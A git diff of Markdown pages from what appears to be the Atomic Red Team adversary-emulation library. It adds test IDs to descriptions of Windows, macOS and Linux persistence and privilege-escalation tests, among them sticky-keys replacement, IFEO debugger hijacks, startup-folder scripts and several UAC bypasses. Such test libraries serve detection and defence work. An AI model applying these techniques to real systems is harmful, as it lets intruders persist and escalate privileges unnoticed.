## Atomic Test #1 - Netsh Helper DLL Registration -Netsh interacts with other operating system components using dynamic-link library (DLL) files +auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d + +Netsh interacts with other operating system components using dynamic-link library (DLL) files **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | helper_file | Path to DLL | Path | C:\Path\file.dll| diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md index e36b7357..69ed5766 100644 --- a/atomics/T1546.008/T1546.008.md +++ b/atomics/T1546.008/T1546.008.md @@ -26,17 +26,19 @@ Other accessibility features exist that may also be leveraged in a similar fashi
## Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes + +auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 + Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_list | Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" | String | osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe| | attached_process | Full path to process to attach to target in #{parent_list}. Default: cmd.exe | Path | C:\windows\system32\cmd.exe| @@ -82,8 +84,10 @@ Foreach ($item in $input_table)
## Atomic Test #2 - Replace binary of sticky keys -Replace sticky keys binary (sethc.exe) with cmd.exe +auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + +Replace sticky keys binary (sethc.exe) with cmd.exe **Supported Platforms:** Windows diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md index 6a34b973..4e7b5e57 100644 --- a/atomics/T1546.010/T1546.010.md +++ b/atomics/T1546.010/T1546.010.md @@ -14,20 +14,22 @@ The AppInit DLL functionality is disabled in Windows 8 and later versions when s
## Atomic Test #1 - Install AppInit Shim + +auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 + AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | registry_file | Windows Registry File | Path | PathToAtomicsFolder\T1546.010\src\T1546.010.reg| | registry_cleanup_file | Windows Registry File | Path | PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg| @@ -51,7 +53,7 @@ reg.exe import #{registry_cleanup_file} >nul 2>&1 ##### Description: Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) ##### Check Prereq Commands: ```powershell -if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} +if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -63,7 +65,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato ##### Description: DLL's must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) ##### Check Prereq Commands: ```powershell -if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} +if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md index d04659d0..6b734da2 100644 --- a/atomics/T1546.011/T1546.011.md +++ b/atomics/T1546.011/T1546.011.md @@ -30,19 +30,21 @@ Utilizing these shims may allow an adversary to perform several malicious acts s
## Atomic Test #1 - Application Shim Installation + +auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 + Install a shim database. This technique is used for privilege escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete." will be displayed. To verify the shim behavior, run the AtomicTest.exe from the \\T1546.011\\bin directory. You should see a message box appear with "Atomic Shim DLL Test!" as defined in the AtomicTest.dll. To better understand what is happening, review the source code files is the \\T1546.011\\src directory. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path to the shim database file | String | PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb| @@ -65,7 +67,7 @@ sdbinst.exe -u #{file_path} >nul 2>&1 ##### Description: Shim database file must exist on disk at specified location (#{file_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}) {exit 0} else {exit 1} +if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -76,7 +78,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato ##### Description: AtomicTest.dll must exist at c:\Tools\AtomicTest.dll ##### Check Prereq Commands: ```powershell -if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} +if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -91,10 +93,12 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - New shim database files created in the default shim database directory + +auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d + Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - **Supported Platforms:** Windows @@ -123,11 +127,13 @@ Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -Err
## Atomic Test #3 - Registry key creation and/or modification events for SDB + +auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f + Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing the registry keys that were created. These keys can also be viewed using the Registry Editor. https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - **Supported Platforms:** Windows diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md index 0387c735..fb65e2d6 100644 --- a/atomics/T1546.012/T1546.012.md +++ b/atomics/T1546.012/T1546.012.md @@ -22,15 +22,17 @@ Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniqu
## Atomic Test #1 - IFEO Add Debugger -Leverage Global Flags Settings +auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 + +Leverage Global Flags Settings **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_binary | Binary To Attach To | Path | C:\Windows\System32\calc.exe| | payload_binary | Binary To Execute | Path | C:\Windows\System32\cmd.exe| @@ -56,15 +58,17 @@ reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Imag
## Atomic Test #2 - IFEO Global Flags -Leverage Global Flags Settings +auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 + +Leverage Global Flags Settings **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_binary | Binary To Attach To | Path | C:\Windows\System32\notepad.exe| | payload_binary | Binary To Execute | Path | C:\Windows\System32\cmd.exe| diff --git a/atomics/T1546.013/T1546.013.md b/atomics/T1546.013/T1546.013.md index ddd23f09..f3f31982 100644 --- a/atomics/T1546.013/T1546.013.md +++ b/atomics/T1546.013/T1546.013.md @@ -16,15 +16,17 @@ An adversary may also be able to escalate privileges if a script in a PowerShell
## Atomic Test #1 - Append malicious start-process cmdlet -Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. +auto_generated_guid: 090e5aa5-32b6-473b-a49b-21e843a56896 + +Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_path | Path the malicious executable | Path | calc.exe| | ps_profile | Powershell profile to use | String | $profile| @@ -51,7 +53,7 @@ Set-Content $profile -Value $oldprofile ##### Description: Ensure a powershell profile exists for the current user ##### Check Prereq Commands: ```powershell -if (Test-Path #{ps_profile}) {exit 0} else {exit 1} +if (Test-Path #{ps_profile}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1546.014/T1546.014.md b/atomics/T1546.014/T1546.014.md index 1e5dbb49..1c3eea1b 100644 --- a/atomics/T1546.014/T1546.014.md +++ b/atomics/T1546.014/T1546.014.md @@ -14,15 +14,17 @@ Adversaries may abuse this service by writing a rule to execute commands when a
## Atomic Test #1 - Persistance with Event Monitor - emond -Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 +auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 + +Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | plist | Path to attacker emond plist file | path | PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist| diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 3df5043a..7e20060b 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -60,17 +60,19 @@ Adversaries can use these configuration locations to execute malware, such as re
## Atomic Test #1 - Reg Key Run + +auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 + Run Key Persistence Upon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe| @@ -95,17 +97,19 @@ REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red T
## Atomic Test #2 - Reg Key RunOnce + +auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb + RunOnce Key Persistence. Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll| @@ -130,16 +134,18 @@ REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
## Atomic Test #3 - PowerShell Registry RunOnce + +auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 + RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | powershell.exe| | reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce| @@ -166,10 +172,12 @@ Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ig
## Atomic Test #4 - Suspicious vbs file run from startup Folder + +auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 + vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. - **Supported Platforms:** Windows @@ -200,11 +208,13 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
## Atomic Test #5 - Suspicious jse file run from startup Folder + +auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 + jse files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. - **Supported Platforms:** Windows @@ -235,10 +245,12 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
## Atomic Test #6 - Suspicious bat file run from startup Folder + +auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e + bat files can be placed in and executed from the startup folder to maintain persistance. Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. - **Supported Platforms:** Windows @@ -269,8 +281,10 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batsta
## Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder -Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. +auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d + +Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. **Supported Platforms:** Windows diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md index 5fe2f423..a360c823 100644 --- a/atomics/T1547.004/T1547.004.md +++ b/atomics/T1547.004/T1547.004.md @@ -22,17 +22,19 @@ Adversaries may take advantage of these features to repeatedly execute malicious
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell + +auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 + PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| @@ -57,17 +59,19 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell + +auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb + PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| @@ -92,17 +96,19 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell + +auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 + PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll| diff --git a/atomics/T1547.005/T1547.005.md b/atomics/T1547.005/T1547.005.md index 3b89b849..f067e1e4 100644 --- a/atomics/T1547.005/T1547.005.md +++ b/atomics/T1547.005/T1547.005.md @@ -12,15 +12,17 @@ The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentC
## Atomic Test #1 - Modify SSP configuration in registry -Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. +auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e + +Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp| diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md index cff18b2b..94c10ffe 100644 --- a/atomics/T1547.006/T1547.006.md +++ b/atomics/T1547.006/T1547.006.md @@ -16,15 +16,17 @@ Adversaries can use LKMs and kexts to covertly persist on a system and elevate p
## Atomic Test #1 - Linux - Load Kernel Module via insmod -This test uses the insmod command to load a kernel module for Linux. +auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 + +This test uses the insmod command to load a kernel module for Linux. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | module_name | Name of the kernel module name. | string | T1547006| | module_path | Folder used to store the module. | path | /tmp/T1547.006/T1547006.ko| @@ -51,7 +53,7 @@ sudo rmmod #{module_name} ##### Description: The kernel module must exist on disk at specified location ##### Check Prereq Commands: ```bash -if [ -f #{module_path} ]; then exit 0; else exit 1; fi; +if [ -f #{module_path} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1547.007/T1547.007.md b/atomics/T1547.007/T1547.007.md index 42a377fa..ef96fb9a 100644 --- a/atomics/T1547.007/T1547.007.md +++ b/atomics/T1547.007/T1547.007.md @@ -14,10 +14,12 @@ An adversary can modify one of these files directly to include a link to their m
## Atomic Test #1 - Re-Opened Applications + +auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba + Plist Method [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - **Supported Platforms:** macOS @@ -42,17 +44,19 @@ or
## Atomic Test #2 - Re-Opened Applications + +auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb + Mac Defaults [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script | path to script | path | /path/to/script| diff --git a/atomics/T1547.009/T1547.009.md b/atomics/T1547.009/T1547.009.md index c2f26034..c36f9fe2 100644 --- a/atomics/T1547.009/T1547.009.md +++ b/atomics/T1547.009/T1547.009.md @@ -14,17 +14,19 @@ Adversaries could use shortcuts to execute their tools for persistence. They may
## Atomic Test #1 - Shortcut Modification + +auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce + This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. Upon execution, calc.exe will be launched. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | shortcut_file_path | shortcut modified and execute | path | %temp%\T1547.009_modified_shortcut.url| @@ -51,9 +53,11 @@ del -f #{shortcut_file_path} >nul 2>&1
## Atomic Test #2 - Create shortcut to cmd in startup folders + +auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 + LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" to view the new shortcut. - **Supported Platforms:** Windows diff --git a/atomics/T1547.010/T1547.010.md b/atomics/T1547.010/T1547.010.md index 60ed62c2..db194c9d 100644 --- a/atomics/T1547.010/T1547.010.md +++ b/atomics/T1547.010/T1547.010.md @@ -19,15 +19,17 @@ Adversaries can use this technique to load malicious code at startup that will p
## Atomic Test #1 - Add Port Monitor persistence in Registry -Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. +auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 + +Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | monitor_dll | Addition to port monitor registry key. Normally refers to a DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL. | Path | C:\Path\AtomicRedTeam.dll| diff --git a/atomics/T1547.011/T1547.011.md b/atomics/T1547.011/T1547.011.md index e18c5b40..1056a105 100644 --- a/atomics/T1547.011/T1547.011.md +++ b/atomics/T1547.011/T1547.011.md @@ -14,8 +14,10 @@ A specific plist used for execution at login is com.apple.loginitems.plist
## Atomic Test #1 - Plist Modification -Modify MacOS plist file in one of two directories +auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 + +Modify MacOS plist file in one of two directories **Supported Platforms:** macOS diff --git a/atomics/T1548.001/T1548.001.md b/atomics/T1548.001/T1548.001.md index 5cee87b3..79887ecd 100644 --- a/atomics/T1548.001/T1548.001.md +++ b/atomics/T1548.001/T1548.001.md @@ -18,15 +18,17 @@ Adversaries can use this mechanism on their own malware to make sure they're abl
## Atomic Test #1 - Make and modify binary from C source -Make, change owner, and change file attributes on a C source code file +auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 + +Make, change owner, and change file attributes on a C source code file **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | payload | hello.c payload | path | PathToAtomicsFolder/T1548.001/src/hello.c| @@ -57,15 +59,17 @@ sudo rm /tmp/hello.c
## Atomic Test #2 - Set a SetUID flag on file -This test sets the SetUID flag on a file in Linux and macOS. +auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 + +This test sets the SetUID flag on a file in Linux and macOS. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_setuid | Path of file to set SetUID flag | path | /tmp/evilBinary| @@ -92,15 +96,17 @@ sudo rm #{file_to_setuid}
## Atomic Test #3 - Set a SetGID flag on file -This test sets the SetGID flag on a file in Linux and macOS. +auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c + +This test sets the SetGID flag on a file in Linux and macOS. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_setuid | Path of file to set SetGID flag | path | /tmp/evilBinary| diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 597dc756..1d8250bc 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -34,16 +34,18 @@ Another bypass is possible through some lateral movement techniques if credentia
## Atomic Test #1 - Bypass UAC using Event Viewer (cmd) + +auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 + Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -69,16 +71,18 @@ reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
## Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell) + +auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b + PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -105,16 +109,18 @@ Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
## Atomic Test #3 - Bypass UAC using Fodhelper + +auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 + Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -141,16 +147,18 @@ reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell + +auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa + PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution command prompt will be opened. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -178,16 +186,18 @@ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ig
## Atomic Test #5 - Bypass UAC using ComputerDefaults (PowerShell) + +auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f + PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 Upon execution administrative command prompt should open - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -215,16 +225,18 @@ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ig
## Atomic Test #6 - Bypass UAC by Mocking Trusted Directories + +auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1 + Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -252,18 +264,20 @@ del "c:\testbypass.exe" >nul 2>nul
## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute + +auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 + Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command.to.execute | Command to execute | string | cmd.exe /c notepad.exe| @@ -291,9 +305,11 @@ Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction I
## Atomic Test #8 - Disable UAC using reg.exe + +auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 - **Supported Platforms:** Windows @@ -320,6 +336,9 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En
## Atomic Test #9 - Bypass UAC using SilentCleanup task + +auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). @@ -331,14 +350,13 @@ And forcefully run SilentCleanup task: schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat| diff --git a/atomics/T1548.003/T1548.003.md b/atomics/T1548.003/T1548.003.md index dc2d0842..6188a9e6 100644 --- a/atomics/T1548.003/T1548.003.md +++ b/atomics/T1548.003/T1548.003.md @@ -22,8 +22,10 @@ In the wild, malware has disabled tty_tickets to potentially make s
